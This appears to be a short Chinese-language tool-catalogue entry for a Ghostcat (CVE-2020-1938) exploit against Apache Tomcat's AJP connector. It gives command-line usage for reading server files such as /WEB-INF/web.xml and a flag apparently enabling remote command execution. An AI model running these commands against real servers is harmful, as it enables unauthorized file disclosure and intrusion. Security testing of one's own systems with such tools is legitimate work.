黑客、渗透测试和网络安全工具,武装您的安全武器库!
针对 CVE-2020-1938 (Ghostcat) 的漏洞利用工具,可通过 AJP 连接器在存在漏洞的 Apache Tomcat 服务器上实现文件读取和远程命令执行。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
python3 tomcat.py URL -f /WEB-INF/web.xml
示例:
python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090
add --rec 1
参考: https://www.t00ls.net/articles-55062.html